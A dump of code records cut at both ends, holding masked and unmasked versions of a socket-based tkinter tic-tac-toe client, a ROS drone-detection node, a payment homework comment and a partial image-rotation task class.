w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 
'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\nb1 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b1))\nb1.grid(row=0, column=0)\nb2 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b2))\nb2.grid(row=0, column=1)\nb3 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b3))\nb3.grid(row=0, column=2)\nb4 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b4))\nb4.grid(row=1, column=0)\nb5 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b5))\nb5.grid(row=1, column=1)\nb6 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b6))\nb6.grid(row=1, column=2)\nb7 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b7))\nb7.grid(row=2, column=0)\nb8 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b8))\nb8.grid(row=2, column=1)\nb9 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b9))\nb9.grid(row=2, column=2)\nlabels = Label(New, fg='white', bg='black', pady=1, text='Opponent Turn ',\n height=2, justify='center')\nlabels.grid(row=3, column=0)\nfor w in New.winfo_children():\n w.configure(state='disabled')\nNew.mainloop()\n",
"step-5": "from tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom PIL import Image, ImageTk\r\nimport time\r\nimport socket\r\nimport threading\r\nroot = Tk()\r\nroot.title(\"Tic-Tac-Toe\")\r\nroot.geometry('600x600')\r\n\r\n\r\nwinner = False\r\n\r\ndef start_thread(target):\r\n thread = threading.Thread(target=target)\r\n thread.daemon = True\r\n thread.start()\r\n \r\nHOST = '127.0.0.1' \r\nPORT = 65432\r\nglobal connection_established\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.connect((HOST, PORT))\r\n\r\nconnection_established = True\r\n\r\ndef receive_data():\r\n \r\n while True:\r\n data = sock.recv(1024).decode()\r\n print('decoded is',data)\r\n \r\n if data == 'button': \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b1.config(text='X') \r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b1.config(state=\"disabled\")\r\n \r\n \r\n \r\n elif data == 'button2' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b2.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b2.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button3' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b3.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b3.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button4' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b4.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b4.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button5' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b5.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b5.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button6' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b6.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b6.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button7' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b7.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b7.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button8' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b8.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b8.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button9' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b9.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b9.config(state=\"disabled\")\r\n \r\n \r\n \r\nstart_thread(receive_data)\r\n\r\ndef resize_image(event):\r\n new_width = event.width\r\n new_height = event.height\r\n image = copy_of_image.resize((new_width, new_height))\r\n photo = ImageTk.PhotoImage(image)\r\n label.config(image = photo)\r\n label.image = photo #avoid garbage collection\r\n\r\nimage = Image.open('C:\\\\Users\\\\User\\\\Any_Path\\\\Tic-tac-toe1.png')\r\ncopy_of_image = image.copy()\r\nphoto = ImageTk.PhotoImage(image)\r\nlabel = ttk.Label(root, image = photo)\r\nlabel.bind('<Configure>', resize_image)\r\nlabel.pack(fill=BOTH, expand = YES)\r\n\r\nroot.after(5000, lambda: root.destroy()) # Destroy the widget after 30 seconds\r\nroot.mainloop()\r\n\r\nNew = Tk()\r\nNew.title('Tic-Tac-Toe')\r\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\r\n\r\n\r\n\r\nclicked = 'Y'\r\ndef checkwin():\r\n global winner\r\n winner = False\r\n if 
b1[\"text\"] == \"X\" and b2[\"text\"] == \"X\" and b3[\"text\"] == \"X\":\r\n b1.config(bg='green')\r\n b2.config(bg='green')\r\n b3.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b4[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b6[\"text\"] == \"X\":\r\n b4.config(bg='green')\r\n b5.config(bg='green')\r\n b6.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\") \r\n \r\n elif b7[\"text\"] == \"X\" and b8[\"text\"] == \"X\" and b9[\"text\"] == \"X\":\r\n b7.config(bg='green')\r\n b8.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"X\" and b4[\"text\"] == \"X\" and b7[\"text\"] == \"X\":\r\n b1.config(bg='green')\r\n b4.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b2[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b8[\"text\"] == \"X\":\r\n b2.config(bg='green')\r\n b5.config(bg='green')\r\n b8.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\") \r\n \r\n elif b3[\"text\"] == \"X\" and b6[\"text\"] == \"X\" and b9[\"text\"] == \"X\":\r\n b3.config(bg='green')\r\n b6.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b9[\"text\"] == \"X\":\r\n b1.config(bg='green')\r\n b5.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b3[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b7[\"text\"] == \"X\":\r\n b3.config(bg='green')\r\n b5.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\") \r\n \r\n ###################################\r\n \r\n \r\n elif b1[\"text\"] == \"O\" and b2[\"text\"] == \"O\" and b3[\"text\"] == \"O\":\r\n b1.config(bg='green')\r\n b2.config(bg='green')\r\n b3.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b4[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b6[\"text\"] == \"O\":\r\n b4.config(bg='green')\r\n b5.config(bg='green')\r\n b6.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\") \r\n \r\n elif b7[\"text\"] == \"O\" and b8[\"text\"] == \"O\" and b9[\"text\"] == \"O\":\r\n b7.config(bg='green')\r\n b8.config(bg='green')\r\n b9.config(bg='green')\r\n 
winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"O\" and b4[\"text\"] == \"O\" and b7[\"text\"] == \"O\":\r\n b1.config(bg='green')\r\n b4.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b2[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b8[\"text\"] == \"O\":\r\n b2.config(bg='green')\r\n b5.config(bg='green')\r\n b8.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\") \r\n \r\n elif b3[\"text\"] == \"O\" and b6[\"text\"] == \"O\" and b9[\"text\"] == \"O\":\r\n b3.config(bg='green')\r\n b6.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b9[\"text\"] == \"O\":\r\n b1.config(bg='green')\r\n b5.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo('Winner',\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n\r\n elif b3[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b7[\"text\"] == \"O\":\r\n b3.config(bg='green')\r\n b5.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n\r\n \r\n \r\n \r\ndef b_click(b):\r\n \r\n to_send = str(b)\r\n \r\n to_send = to_send.replace('.', '')\r\n to_send = str(to_send.replace('!', ''))\r\n print(to_send)\r\n global clicked\r\n if b[\"text\"] == '' and b['state'] != 'disabled' :\r\n labels.config(text=\"X's Turn\")\r\n b.configure(state=DISABLED)\r\n b['text'] = 'O' \r\n checkwin() \r\n if connection_established == True:\r\n sock.send(to_send.encode())\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nb1 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b1))\r\nb1.grid(row=0,column=0)\r\nb2 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b2))\r\nb2.grid(row=0,column=1)\r\nb3 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b3))\r\nb3.grid(row=0,column=2)\r\n\r\nb4 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b4))\r\nb4.grid(row=1,column=0)\r\nb5 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b5))\r\nb5.grid(row=1,column=1)\r\nb6 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b6))\r\nb6.grid(row=1,column=2)\r\n\r\nb7 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b7))\r\nb7.grid(row=2,column=0)\r\nb8 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b8))\r\nb8.grid(row=2,column=1)\r\nb9 = Button(New, 
text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b9))\r\nb9.grid(row=2,column=2)\r\n\r\nlabels = Label(New, fg=\"white\",bg=\"black\", pady=1,text=\"Opponent Turn \",height=2,justify=\"center\")\r\nlabels.grid(row=3,column=0)\r\nfor w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n\r\n#menu = Menu(New)\r\n#New.config(menu=menu)\r\n#options = Menu(menu,tearoff=False)\r\n\r\n\r\nNew.mainloop()\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
# WRITE A PROGRAM THAT CALCULATES THE AMOUNT TO BE PAID FOR A PRODUCT, GIVEN THE NORMAL PRICE AND THE PAYMENT METHOD
# cash or check up front: 10% discount
# card, paid up front: 5% discount
# 2 installments: normal price
# 3 or more installments: 20% interest
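
A minimal sketch of the program these comments describe; the prompts, the menu options, and the reading of the rules as discounts/surcharges on the normal price are assumptions, not part of the original file:

price = float(input('Normal price: '))
option = int(input('[1] cash/check  [2] card up front  [3] 2 installments  [4] 3+ installments: '))
if option == 1:
    total = price * 0.90   # 10% discount
elif option == 2:
    total = price * 0.95   # 5% discount
elif option == 3:
    total = price          # normal price, split in 2
else:
    total = price * 1.20   # 20% interest for 3 or more installments
print('Amount to pay: {:.2f}'.format(total))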
|
normal
|
{
"blob_id": "fa271d3888dc60582fa0883eaf9f9ebbdffeed9d",
"index": 3064,
"step-1": "# ELABORE UM PROGRAMA QUE CALCULE O A SER PAGO POR UM PRODUTO CONSIDERANDO O PRECO NORMAL E A FORMA DE PAGAMENTO\n# a vista dinehiro ou cheque: 10%\n# a vista no cartao: 5%\n# 2x: preco normal\n# 3x ou mais: 20% de juros",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
#!/usr/bin/env python
import rospy
import cv2
import numpy as np
from cv_bridge import CvBridge
from matplotlib import pyplot as plt
from sensor_msgs.msg import Image
from drone_app_msgs.msg import BBox, Drone, DroneArray
from rospy.numpy_msg import numpy_msg
# ---------------------------------------
# This is an implementation of a simple CV
# algorithm that can be used for testing
# --- Global variables initialization ---
pub = None
# ---------------------------------------
def processFrame(image_message):
# --- Convert from ROS to OpenCV
frame = CvBridge().imgmsg_to_cv2(image_message)
# --- Threshold the image and find a mask
frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))
mask = cv2.dilate(mask, None, iterations=1)
    # --- Find contours in the mask and initialize the current center
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
c = max(cnts, key=cv2.contourArea)
x,y,w,h = cv2.boundingRect(c)
# --- Pack in the message
msg = DroneArray()
drone = Drone()
drone.id = -1
drone.name = 'parrot_bebop2'
drone.box.t.linear.x = x * 100 / 640
drone.box.t.linear.y = y * 100 / 480
drone.box.w = w * 100 / 640
drone.box.h = h * 100 / 480
msg.drones.append(drone)
pub.publish(msg)
if __name__ == '__main__' :
# --- Topics
rospy.init_node('gazeboTracking', anonymous=True)
rospy.Subscriber('camera_img', Image, processFrame)
pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)
rospy.spin()
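
A hedged sketch of a matching consumer node (hypothetical; shown as a separate script, not part of the original file — it assumes only the message fields encoded above):

#!/usr/bin/env python
import rospy
from drone_app_msgs.msg import DroneArray

def on_drones(msg):
    for d in msg.drones:
        # Box fields are percentages of the 640x480 frame, as encoded above.
        rospy.loginfo('%s at (%.1f%%, %.1f%%)', d.name, d.box.t.linear.x, d.box.t.linear.y)

if __name__ == '__main__':
    rospy.init_node('droneListener', anonymous=True)
    rospy.Subscriber('fixed_drones', DroneArray, on_drones)
    rospy.spin()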
|
normal
|
{
"blob_id": "e864dad3f46fc9c6c472823bd06ce74fb5cb3f41",
"index": 462,
"step-1": "<mask token>\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\nif __name__ == '__main__':\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n rospy.spin()\n",
"step-3": "<mask token>\npub = None\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\nif __name__ == '__main__':\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n rospy.spin()\n",
"step-4": "import rospy\nimport cv2\nimport numpy as np\nfrom cv_bridge import CvBridge\nfrom matplotlib import pyplot as plt\nfrom sensor_msgs.msg import Image\nfrom drone_app_msgs.msg import BBox, Drone, DroneArray\nfrom rospy.numpy_msg import numpy_msg\npub = None\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\nif __name__ == '__main__':\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n rospy.spin()\n",
"step-5": "#!/usr/bin/env python\nimport rospy\nimport cv2\nimport numpy as np\nfrom cv_bridge import CvBridge\nfrom matplotlib import pyplot as plt\nfrom sensor_msgs.msg import Image\nfrom drone_app_msgs.msg import BBox, Drone, DroneArray\nfrom rospy.numpy_msg import numpy_msg\n\n# ---------------------------------------\n# This is an implementation of a simple CV\n# algorithm that can be used for testing\n# --- Global variables initialization ---\npub = None\n# ---------------------------------------\n\ndef processFrame(image_message):\n # --- Convert from ROS to OpenCV\n frame = CvBridge().imgmsg_to_cv2(image_message)\n\n # --- Threshold the image and find a mask\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n\n # --- Find contours in the mask and initialize the current\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x,y,w,h = cv2.boundingRect(c)\n\n # --- Pack in the message\n msg = DroneArray()\n drone = Drone()\n\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n\n msg.drones.append(drone)\n pub.publish(msg)\n\nif __name__ == '__main__' :\n # --- Topics\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n \n rospy.spin()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class Task(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Task(object):
<|reserved_special_token_0|>
def __init__(self, input_dir, output_dir, **kwargs):
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir,
degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
